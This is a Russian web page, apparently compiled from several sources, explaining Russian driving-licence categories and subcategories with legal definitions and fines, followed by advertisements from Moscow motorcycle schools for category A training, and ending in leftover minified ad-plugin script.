Права категории а

Категории водительских удостоверений

Транспортные средства относятся к источникам повышенной опасности для окружающих, поэтому право на управление ими предоставляется лицам, отвечающим определенным требованиям (таблица 1 «Категории водительских прав»). Для того чтобы получить водительское удостоверение определенной категории, требуется сдать экзамен. Стоит отметить, что для того, чтобы управлять велосипедом, сдавать такой экзамен не требуется, хотя не стоит забывать об установленных возрастных ограничениях для движения на нем по дорогам – 14 лет (п. 24.1 ПДД).

Таблица 1. «Категории водительских прав»

Экзамены принимаются на транспортных средствах с механической или автоматической трансмиссией. Лицам, сдавшим экзамены на транспортных средствах с механической трансмиссией, предоставляется право на управление транспортными средствами соответствующей категории или подкатегории с любым видом трансмиссии. Лицам, сдавшим экзамены на транспортных средствах с автоматической трансмиссией, предоставляется право на управление транспортными средствами соответствующей категории или подкатегории только с автоматической трансмиссией.

Российское национальное водительское удостоверение, подтверждающее право на управление транспортными средствами категории «А», подтверждает также право на управление транспортными средствами подкатегории «А1» и подкатегории «В1» с мотоциклетной посадкой или рулем мотоциклетного типа, категории «В» — подкатегории «В1» (кроме транспортных средств с мотоциклетной посадкой или рулем мотоциклетного типа), категории «С» — подкатегории «С1», категории «D» — подкатегории «D1», категории «СЕ» — подкатегории «С1E», категории «DE» — подкатегории «D1E». Российское национальное водительское удостоверение или временное разрешение на право управления транспортными средствами, подтверждающие право на управление транспортными средствами любой из этих категорий или подкатегорий, подтверждает право на управление транспортными средствами категории «М» (п. 7 ст. 25 Федерального закона от 10 декабря 1995 г. № 196-ФЗ «О безопасности дорожного движения»).

Лица, проходящие военную службу, после соответствующего профессионального обучения допускаются к сдаче экзаменов на право управления транспортными средствами категории «D» и подкатегории «D1» по достижении девятнадцатилетнего возраста.
До достижения указанными лицами двадцатиоднолетнего возраста выданные им по результатам сдачи экзаменов российские национальные водительские удостоверения подтверждают право на управление транспортными средствами категории «D» и подкатегории «D1», принадлежащими только Вооруженным Силам Российской Федерации, другим войскам, воинским формированиям и органам, в которых федеральными законами предусмотрена военная служба (п. 4 ст. 26 Федерального закона от 10 декабря 1995 г. № 196-ФЗ «О безопасности дорожного движения»).

Водительское удостоверение любой категории выдается на срок 10 лет, за исключением лиц, временно пребывающих на территории России и не имеющим иностранных национальных водительских удостоверений. В этом случае выдача российского водительского удостоверения производится на общих основаниях на срок действия регистрации их документов на право временного пребывания в Российской Федерации.

Квадрициклы, трициклы и мопеды

Не следует путать понятия «КвадрОцикл» и «КвадрИцикл». К легким квадрициклам относятся четырехколесные транспортные средства, ненагруженная масса которых не превышает 350 кг без учета массы аккумуляторов (в случае электрического транспортного средства), максимальная конструктивная скорость не превышает 50 км/ч, характеризующееся:

  • в случае двигателя внутреннего сгорания с принудительным зажиганием – рабочим объемом двигателя, не превышающим 50 куб.см.;
  • в случае двигателя внутреннего сгорания другого типа – максимальной эффективной мощностью двигателя, не превышающей 4 кВт;
  • в случае электродвигателя – номинальный максимальной мощностью двигателя в режиме длительной нагрузки, не превышающей 4 кВт.

Категория В1 разрешает управление не только легкими, но и прочими квадрициклами, к которым относятся четырехколесные транспортные средства, ненагруженная масса которых не превышает 400 кг (550 кг для транспортного средства, предназначенного для перевозки грузов) без учета массы аккумуляторов (в случае электрического транспортного средства) и максимальная эффективная мощность двигателя не превышает 15 кВт.

Трицикл – это трехколесное транспортное средство с колесами, симметричными по отношению к средней продольной плоскости транспортного средства, рабочий объем двигателя которого (в случае двигателя внутреннего сгорания) превышает 50 куб.см. и (или) максимальная конструктивная скорость (при любом двигателе) превышает 50 км/ч.

Мопед – это двухколесное или трехколесное транспортное средство с любым расположением колес, максимальная конструктивная скорость которого не превышает 50 км/ч, характеризующееся: — в случае двигателя внутреннего сгорания с принудительным зажиганием — рабочим объемом двигателя, не превышающим 50 куб.см., или — в случае двигателя внутреннего сгорания другого типа — максимальной эффективной мощностью, не превышающей 4 кВт, или — в случае электродвигателя — номинальной максимальной мощностью в режиме длительной нагрузки, не превышающей 4 кВт.

Категории и подкатегории водительских прав в 2020 году

Добрый день, уважаемый читатель.

Категория водительских прав обозначает группу транспортных средств, которой может управлять владелец водительского удостоверения.

Существуют 5 основных категорий: А — мотоциклы, B — легковые автомобили, C — грузовые автомобили, D — автобусы, М — мопеды, 4 подкатегории: A1, B1, C1, D1 и специальные категории для управления автомобилями с прицепом BE, CE, DE, C1E, D1E.

Например, водительское удостоверение категории B позволяет управлять только легковыми автомобилями и не разрешает садиться за руль маршрутного такси или автобуса (для этих транспортных средств нужны водительские права категории Д).

В этой статье будут рассмотрены категории и подкатегории водительских прав, а также особенности их использования при управлении транспортными средствами.

Водитель имеет право управлять только транспортными средствами, категории которых указаны на оборотной стороне его водительского удостоверения. Если он не будет соблюдать указанное требование, то получит штраф за отсутствие категории прав —
5 000 — 15 000 рублей.

Таблица категорий водительских прав в 2020 году

С 5 ноября 2013 года вступили в силу изменения в закон «О безопасности дорожного движения», которые не только изменили перечень категорий водительского удостоверения, но и добавили совершенно новые подкатегории.

Расшифровка категорий водительских прав приведена в следующей таблице:

Водительские права категории А

1. В Российской Федерации устанавливаются следующие категории и входящие в них подкатегории транспортных средств, на управление которыми предоставляется специальное право (далее — право на управление транспортными средствами):

категория «А» — мотоциклы;

Водительское удостоверение категории А позволяет управлять любыми мотоциклами, в том числе и мотоциклами с коляской.

Кроме того, оно дает право на управление мотоколясками, которые в 2020 году на дорогах встретить чрезвычайно сложно.

Напомню, что к мотоциклам в соответствии с ПДД относятся двухколесные транспортные средства с боковым прицепом или без него. Кроме того, категория А позволяет управлять трехколесными и четырехколесными транспортными средствами, которые в снаряженном состоянии имеют массу не более 400 кг.

Подкатегория А1

подкатегория «А1» — мотоциклы с рабочим объемом двигателя внутреннего сгорания, не превышающим 125 кубических сантиметров, и максимальной мощностью, не превышающей 11 киловатт;

Подкатегория А1 позволяет управлять мотоциклами с небольшим объемом двигателя и небольшой максимальной мощностью.

Отмечу, что водители, имеющие в правах категорию А могут управлять и транспортными средствами подкатегории А1.

Важное отличие подкатегории А1 состоит в том, что ее можно открыть в 16-летнем возрасте.

Водительское удостоверение категории В

категория «В» — автомобили (за исключением транспортных средств категории «А»), разрешенная максимальная масса которых не превышает 3500 килограммов и число сидячих мест которых, помимо сиденья водителя, не превышает восьми; автомобили категории «В», сцепленные с прицепом, разрешенная максимальная масса которого не превышает 750 килограммов; автомобили категории «В», сцепленные с прицепом, разрешенная максимальная масса которого превышает 750 килограммов, но не превышает массы автомобиля без нагрузки, при условии, что общая разрешенная максимальная масса такого состава транспортных средств не превышает 3500 килограммов;

Водительское удостоверение категории В позволяет управлять легковыми автомобилями, а также небольшими грузовиками, микроавтобусами и джипами, соответствующими вышеприведенным требованиям.

Также категория B дает право управления мотоколясками и автомобилями с прицепом, разрешенная максимальная масса которого не более 750 кг.

Кроме того существует возможность использования и прицепов, масса которых превышает 750 килограммов, при соблюдении следующих требований:

1. Разрешенная максимальная масса прицепа не должна превышать массы автомобиля без нагрузки.

2. Суммарная разрешенная максимальная масса автомобиля и прицепа не должна превышать 3,5 тонны.

Например, пусть разрешенная максимальная масса автомобиля составляет 1 900 кг, а масса без нагрузки 1 400 кг (эти величины указываются в пунктах 14 и 15 паспорта транспортного средства).

Имея удостоверение категории B можно к указанному автомобилю присоединить прицеп, разрешенная максимальная масса которого 1400 кг. В этом случае разрешенная максимальная масса прицепа не превышает массу автомобиля без нагрузки. Кроме того, разрешенная максимальная масса состава транспортных средств составляет 1 900 + 1 400 = 3 300 кг. Она не превышает 3 500 килограммов.

Для управления автомобилем категории B с тяжелым прицепом, водителю потребуется категория BE:

категория «ВЕ» — автомобили категории «В», сцепленные с прицепом, разрешенная максимальная масса которого превышает 750 килограммов и превышает массу автомобиля без нагрузки; автомобили категории «В», сцепленные с прицепом, разрешенная максимальная масса которого превышает 750 килограммов, при условии, что общая разрешенная максимальная масса такого состава транспортных средств превышает 3500 килограммов;

Подкатегория B1

подкатегория «В1» — трициклы и квадрициклы;

В 2019 году подробная информация по транспортным средствам категории B1 отсутствует.

Обратите внимание, «квадрИцикл» и «квадрОцикл» это не одно и то же. Поэтому обычные водительские права на квадроцикл не подойдут.

Водительские права категории С

категория «С» — автомобили, за исключением автомобилей категории «D», разрешенная максимальная масса которых превышает 3500 килограммов; автомобили категории «С», сцепленные с прицепом, разрешенная максимальная масса которого не превышает 750 килограммов;

Водительские права категории С позволяют управлять только средними (от 3500 кг до 7500 кг) и тяжелыми (более 7500 кг) грузовиками, а также грузовиками с прицепом, разрешенная максимальная масса которого не превышает 750 кг.

Обратите внимание, категория C не дает права управления небольшими (меньше 3500 кг) грузовиками и легковыми автомобилями.

категория «СЕ» — автомобили категории «С», сцепленные с прицепом, разрешенная максимальная масса которого превышает 750 килограммов;

Для управления автомобилем категории С с тяжелым (более 750 кг) прицепом или полуприцепом водителю потребуется дополнительная категория CE.

Подкатегория С1

подкатегория «С1» — автомобили, за исключением автомобилей категории «D», разрешенная максимальная масса которых превышает 3500 килограммов, но не превышает 7500 килограммов; автомобили подкатегории «С1», сцепленные с прицепом, разрешенная максимальная масса которого не превышает 750 килограммов;

К подкатегории С1 относятся средние грузовики, разрешенная максимальная масса которых находится в интервале от 3,5 до 7,5 тонн.

Также эта подкатегория позволяет перевозить и легкий прицеп (до 750 кг).

Водители, имеющие основную категорию С, могут управлять и транспортными средствами подкатегории С1.

подкатегория «С1Е» — автомобили подкатегории «С1», сцепленные с прицепом, разрешенная максимальная масса которого превышает 750 килограммов, но не превышает массы автомобиля без нагрузки, при условии, что общая разрешенная максимальная масса такого состава транспортных средств не превышает 12 000 килограммов;

Также существует и дополнительная подкатегория C1E, которая позволяет управлять автомобилями подкатегории С1 с тяжелыми (более 750 кг) прицепами. При этом суммарная разрешенная максимальная масса грузовика и прицепа не должна превышать 12 тонн.

Водители, имеющие старшую категорию CE, могут управлять и транспортными средствами подкатегории C1E.

Водительское удостоверение категории D

категория «D» — автомобили, предназначенные для перевозки пассажиров и имеющие более восьми сидячих мест, помимо сиденья водителя; автомобили категории «D», сцепленные с прицепом, разрешенная максимальная масса которого не превышает 750 килограммов;

Водительское удостоверение категории Д позволяет управлять автобусами различных размеров, независимо от их разрешенной максимальной массы, а также автобусами с прицепом, разрешенная максимальная масса которого не превышает 750 кг.

Имея водительское удостоверение категории D водитель может управлять как небольшими автобусами, используемыми в качестве маршрутных такси, так и огромными туристическими автобусами.

Единственная разновидность автобусов, для которой не подходит категории D, — это сочлененные автобусы или «автобусы с гармошкой».

Для буксировки прицепов, разрешенная максимальная масса которых превышает 750 кг, а также управления сочлененными автобусами требуется водительское удостоверение категории DE.

категория «DЕ» — автомобили категории «D», сцепленные с прицепом, разрешенная максимальная масса которого превышает 750 килограммов; сочлененные автобусы;

Подкатегория D1

подкатегория «D1» — автомобили, предназначенные для перевозки пассажиров и имеющие более восьми, но не более шестнадцати сидячих мест, помимо сиденья водителя; автомобили подкатегории «D1», сцепленные с прицепом, разрешенная максимальная масса которого не превышает 750 килограммов;

Подкатегория D1 позволяет водителю управлять небольшими автобусами, имеющими от 9 до 16 сидячих мест. Также эта категория разрешает использовать легкий прицеп массой до 750 кг.

К данной категории относятся небольшие микроавтобусы, например РАФ-2203 или ГАЗель-3221, которые ранее широко использовались в качестве маршрутных такси. В настоящее время широкое распространение получили микроавтобусы иностранных марок, которые имеют более 16 сидячих мест, и для управления которыми подкатегории D1 недостаточно.

Для управления небольшими автобусами с тяжелыми прицепами предназначена подкатегория D1E:

подкатегория «D1Е» — автомобили подкатегории «D1», сцепленные с прицепом, который не предназначен для перевозки пассажиров, разрешенная максимальная масса которого превышает 750 килограммов, но не превышает массы автомобиля без нагрузки, при условии, что общая разрешенная максимальная масса такого состава транспортных средств не превышает 12 000 килограммов.

Обратите внимание, что прицеп, во-первых, не должен быть предназначен для перевозки пассажиров, а во-вторых, суммарная разрешенная максимальная масса автобуса и прицепа не должна превышать 12 тонн.

Отмечу, что водители, имеющие категорию D, могут управлять автобусами подкатегории D1, а водители, имеющие категорию DE, могут управлять автобусами с прицепом подкатегории D1E.

Категория E

В настоящее время категория E из водительских удостоверений исчезла. На смену ей пришли, представленные выше, категории BE, CE, C1E, DE, D1E.

Если же Вы до сих пор используете удостоверение с категорией Е и хотите его поменять, то рекомендую прочитать статью «Перенос категории E в новые права».

Категория M

категория «M» — мопеды и легкие квадрициклы;

Категория М введена 5 ноября 2013 года. Она позволяет управлять мопедами и легкими квадрициклами.

Управлять транспортными средствами категории М также могут и водители, у которых нет категории М, но есть любая другая категория водительских прав.

Обратите внимание, что удостоверение тракториста-машиниста и иностранные водительские права не позволяют управлять мопедами.

Категории Tb и Tm

категория «Tm» — трамваи;

категория «Tb» — троллейбусы;

В 2020 году для управления трамваями или троллейбусами требуется наличие категории Tm или Tb соответственно.

Напомню, что еще несколько лет назад троллейбусы и трамваи не выделялись в отдельные категории. Информация об управлении этими транспортными средствами заносилась в графу «особые отметки» водительских прав.

Как открыть новую категорию прав?

Довольно часто у водителей возникает вопрос: «Как добавить в права дополнительную категорию?». На самом деле, все довольно просто. Нужно пройти обучение в автошколе и сдать экзамен на соответствующую категорию.

Подробнее об этом Вы можете узнать в статье:

Ну а в завершение хочу еще раз напомнить, что управление транспортным средством без соответствующей категории прав влечет штраф в размере 5 000 — 15 000 рублей. Кроме того, водитель отстраняется от управления транспортным средством, а автомобиль отправляется на штрафстоянку.

Сдача экзамена на права в ГИБДД на категорию А

Для начала обучения на категорию «А», вам необходимо достичь 18 летнего возраста и приехать к нам в школу для заключения договора на обучение.

Для поступления в мотошколу требуется:

  • Паспорт;
  • Две фотографии 3х4 цветные, матовые;
  • Медицинская справка на водительское удостоверение категории «А» (можно пройти коммисию у нас или самостоятельно);
  • Водительское удостоверение (если оно у вас есть).

Мы предлагаем программы обучения, которые включают разное количество практических занятий.
Срок обучения составляет три недели. Оплата курса может быть произведена частями.

Открытая площадка «Косино» (с 1 апреля до 1 ноября):

Теория + 10 практических занятий (45 минут) на мотоцикле Stels Delta 200 — 15 500 рублей
Теория + 18 практических занятий (45 минут) на мотоцикле Stels Delta 200 — 19 500 рублей
Дополнительное практическое занятие на мотоцикле Stels Delta 200 — 750 рублей

Занятия на открытой площадке считаются в академических часах (45 минут) и проходят парно.

Крытые площадки: (круглый год)

Теория + 8 практических занятий на мотоцикле Stels Delta 200 — 16 500 рублей
Теория + 12 практических занятий на мотоцикле Stels Delta 200 — 20 500 рублей
Теория + 18 практических занятий на мотоцикле Stels Delta 200 — 25 000 рублей
Дополнительное практическое занятие на мотоцикле Stels Delta 200 — 1 500 рублей

Занятия на крытой площадке считаются в астрономических часах (60 минут).

Как получить права категории А в Москве?

Хотите выехать на открытую дорогу на двух колесах? Мощный байк – ваша заветная мечта? Рассмотрим, во сколько обойдутся права категории А в Москве, каков процесс обучения вождению и экзамен ГИБДД. Это довольно непростая задача, требующая подготовки и ответственного отношения. Для начала необходимо забронировать место в курсе профессиональной мотошколы. Наша школа предлагает максимально выгодные условия и имеет множество филиалов в городе Москва. Перейдите на наш сайт и найдите группу поблизости с удобным для вас графиком. В нашей мотошколе есть все, чтобы узнать, как получить права категории а.

Для успешной сдачи экзамена необходимо эффективно подготовится к теоретической и практической частям. Необходимо досконально изучить правила дорожного движения, основы безопасного вождения, законодательные нормы, относящиеся к безопасности на дорогах, законы об ответственности водителей. Также следует ориентироваться в правилах оказания первой медицинской помощи жертвам ДТП и основным требованиям по допуску к транспорту, типичным причинам столкновений и способам их предотвращения. Все эти задания содержатся в билетах, состоящих их 20 вопросов. На их решение экзаменующимся дается 20 минут. При успешной сдачи первой части экзамена водитель переходит ко второй части – вождению на специально оборудованных автодромах. Третья часть испытания – управление байком на дорогах города. Чтобы сдать на права категории а, необходимо успешно завершить все три части экзамена. Тогда ГИБДД сможет открыть вам категорию а.

Как проходит обучение?

Практическая часть занятий начинается с основ, таких как открытие дросселя при освобождении сцепления, затем поворот и переключение передач. Учащиеся знакомятся с транспортом и изучают его основные системы управления, учатся правильной посадке и постановке туловища, рук и ног на байке. Ученики выполняют различные упражнения, предназначенные для того, чтобы освоить основную работу мотоцикла, например, как правильно тормозить и переключать передачи с понижением передачи. На ранних этапах обучения на права речь идет о развитии мышечной памяти – повторяющихся комбинаций движений рук и ног, пока они не станут инстинктивными и точными, оставляя глаза и разум водителя свободными для сканирования дороги.

Каждое упражнение начинается со словесного объяснения, за которым следует визуальная демонстрация. Студенты могут повторять упражнение снова и снова, пока они не доведут его до автоматизма. Инструкторы будут давать конструктивные отзывы о вашей технике катания каждый раз, когда вы будете выполнять маневр. Во время подготовки к экзамену используется мотоцикл школы, что является достаточно неплохой идеей: он будет падать не один раз. Ученики не несут никакой ответственности за любые повреждения, а также им предоставляется вся необходимая экипировка бесплатно. Нельзя купить права категории а, но можно пройти эффективный курс подготовки, стоимость которого очень доступная. Наша мотошкола по окончанию обучения помогает в организованной сдачи экзаменов на права в ГИБДД.

Профессиональное, круглогодичное обучение вождению мотоцикла, подготовка к сдаче на права категории «А». Продвинутое вождение и трековая подготовка, обучение стантрайдингу.

Все практические занятия в мотошколе индивидуальные, с инструкторами имеющими государственную лицензию и многолетний опыт обучения вождению мотоцикла.

Мотошкола (категория А — мотоцикл)

Центральная автошкола Москвы предлагает обучение на управление мотоциклами категории «А» и подкатегории «А1».

Условия обучения

Категория «А»
(все мотоциклы)

Подкатегория «А1» (лёгкие мотоциклы)

Примечание

1

Количество часов обучения

Теория – 106
Практика – 18

Теория – 106
Практика – 18

2

Учиться с 17 лет.
Управлять – с 18 лет.

3

Мотоцикл – двухколёсное ТС с боковым прицепом или без него. Кроме того, позволяет управлять трёхколёсными и четырёхколёсными ТС (с рулем мотоциклетного типа), масса которых в снаряженном состоянии не превышает 400 кг

Мотоциклы с двигателем рабочим объёмом не более 125 куб. см и мощностью не более 11 кВт

Водители, имеющие в правах категорию «А» могут управлять ТС подкатегории «А1»

Теоретический курс будущие мотоциклисты могут пройти в любом из 58 учебных классов Центральной автошколы Москвы, расположенных во всех районах Москвы в местах лучшей досягаемости.

Для посещения лекций Вы можете выбрать любой из предлагаемых вариантов: будни- утро / вечер, выходные-утро/день. А ещё их можно комбинировать и совмещать, построив при этом индивидуальный график занятий!

Для закрепления изученного материала или проработки пропущенных тем Вы можете воспользоваться обучением в режиме он-лайн.

Занятия по вождению на мотоцикле проходят на крытых мотодромах. Причём занятия проходят круглый год, в любых погодных условиях.

На период занятий все ученики обеспечиваются необходимой защитной экипировкой.

Общая продолжительность практического курса по вождению мотоцикла составляет 18 часов. Для этих занятий Вы можете выбрать любой день недели (включая выходные), с 7 до 22 часов.

Практические занятия в автошколе проходят на новых мотоциклах Yamaha, KTM и Honda под руководством профессиональных инструкторов, именитых автоспортсменов.

В процессе практических занятий Вы научитесь:

1. Уверенно трогаться и правильно выбирать темп движения.
2. Поддерживать равновесие на медленной скорости несколькими способами и их комбинацией.
3. Правильно ставить взгляд при выполнении элементов.
4. Автоматически выполнять все упражнения.

Общая продолжительность обучения – от 1 до 2 месяцев!

Только в нашей автошколе ГИБДД принимает экзамен на нашей площадке, и бесплатная пересдача экзамена!

Документы для получения водительского удостоверения на право управления мототранспортными средствами категории «А»:

  • заявление;
  • паспорт;
  • медсправка;
  • документ автошколы об окончании обучения;
  • квитанция об оплате государственной пошлины.

Некоторые автомобилисты, имеющие права категории «В», хотят обучиться на мотоцикл.

Для автомобилистов, желающих освоить управление мотоциклом необходимо:

  • Пройти в Центральной автошколе Москвы практическое обучение на право управления мотоциклом – 18 часов;
  • в медицинской справке должна стоять отметка допуска на категорию «А»;
  • написать заявление в МРЭО ГИБДД на открытие категории;
  • сдать экзамены по теории и практике вождения мотоцикла на площадке.

Пройдя обучение в Центральной автошколе на право управления мототранспортными средствами, мы смело представим Вас на экзамен в ГИБДД.

Ваш звонок важен для нас!

Центральная автошкола Москвы предоставляет возможность водителям, имеющим водительское удостоверение категории «А» (мотоцикл), восстановить навыки вождения этими транспортными средствами.

Обучение на права категории А (мотоцикл) в автошколе

Если вы планируете в скором будущем сдать на права, чтобы водить мотоцикл, то наверняка подыскиваете профессиональную автошколу, которые могут обеспечить подготовку к экзамену на категорию А. Обращайтесь в школу «Мос-Мото» – мы занимаемся обучением езде на мотоцикле в Москве круглогодично.

Преимущества занятий в нашей школе

  1. Опытные, вежливые и терпеливые инструкторы.
  2. Крытый мотодром, площадь которого составляет 3,2 тыс. кв. м, для реализации уникальной программы подготовки мотоциклистов с нуля, ориентированной на езду по городу.
  3. Новые мотоциклы для обучения – Yamaha XJ6, Yamaha TW200, Yamaha YBR 125, Honda CB400 и Racer Magnum 250.
  4. Можно заниматься на личном мотоцикле.
  5. Развитая инфраструктура ТРЦ «Мозаика».
  6. Транспортная доступность мотошколы.
  7. Скидка на экипировку от Mr.Moto.

Что входит в цену?

Записавшись на обучение на права категории А в нашу автошколу, вы получите:

  • Теоретический курс длительностью 1 месяц. В ходе него вы выучите ПДД, рассмотрите как типичные, так и редкие ситуации на дорогах, а также узнаете, как себя вести, если они возникли. В программу включены темы, рассматриваемые при обучении на любую водительскую категорию. На занятиях в автошколе вы узнаете, как оказать первую помощь пострадавшему на дороге, какие особенности есть у мотоциклов, сможете научиться алгоритму решения конфликтов, возникающих на дорогах, и правильной тактике общения с сотрудниками ГИБДД.
  • 18 практических занятий.
  • Подготовку документов для получения прав на мотоцикл.
  • Получение свидетельства об окончании автошколы.
  • Сопровождение в ГИБДД.

Необходимые документы

Начать курс обучения на категорию А наша мотошкола предлагает при достижении 18 лет.

Какие документы необходимы, чтобы получить права на мотоцикл?

  • Медсправка с допуском на категорию А, А1, М, В1 с отметками диспансеров (наркологического и психоневрологического по месту регистрации).
  • Паспорт или его ксерокопия (главная стр. + прописка).

Какие навыки и знания вы получите

Пройдя обучение категории А в Москве в автошколе «Мос-Мото», вы научитесь:

  • правильной посадке (положению ног, рук, корпуса), работе корпуса и постановке взгляда;
  • накату баланса;
  • управлению тягой в разных режимах;
  • контролю наклона в повороте задним тормозом и рулем на тяге;
  • торможению двигателем и передним тормозом;
  • управлению в заносе;
  • работе корпусом;
  • позиционированию на дороге – выбору скорости и траектории, адекватных обстановке;
  • темповой езде и езде в рваном темпе;
  • эстакаде;
  • экстренному торможению;
  • работе с буксующим моментом сцепления и тягой;
  • перевозке пассажиров;
  • основам тактики поведения мотоциклиста на дороге.

Также вы сможете ответить на 20 экзаменационных вопросов в билетах.

Чтобы пройти обучение и получить права категории А, свяжитесь с автошколой удобным для вас способом:

  • по тел. +7 (495) 005-78-94 ;
  • по почте inbox@mos-moto.ru;
  • оставив сообщение в форме обратной связи на следующей странице.

Спешите с обращением к нам, чтобы не упустить выгодные условия обучения.

Теория
18 часов практики
Сведительство об окончании
Подготовка документов для ГИБДД

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
